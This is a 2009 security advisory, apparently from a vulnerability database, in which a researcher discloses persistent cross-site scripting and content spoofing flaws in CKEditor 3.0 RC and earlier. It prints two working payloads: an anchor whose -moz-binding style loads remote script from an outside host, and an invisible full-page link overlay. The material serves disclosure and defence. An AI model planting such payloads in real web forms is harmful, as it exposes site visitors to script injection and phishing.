test This...">XSS and Content Spoofing vulnerabilities in CKEditor - vulnerability database | Vulners.comtest This...">test This...">test This...">
Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22522
HistorySep 28, 2009 - 12:00 a.m.

XSS and Content Spoofing vulnerabilities in CKEditor

2009-09-2800:00:00
vulners.com
147

Hello 3APA3A!

I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in CKEditor.

XSS:

This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the
style.

<a href="http://test"
style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss&#39;&#41;&quot;&gt;test&lt;/a&gt;

This vulnerability works in Mozilla and Firefox (before Firefox 3.0).

Content Spoofing:

This is Persistent Content Spoofing vulnerability.

<a href="http://websecurity.com.ua"
style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px">&nbsp;</a>

These vulnerabilities are in editor itself, so they can be used at any site, which use CKeditor
as editor of web forms.

Vulnerable are CKEditor 3.0 RC and previous versions.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/3304/&#41;.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua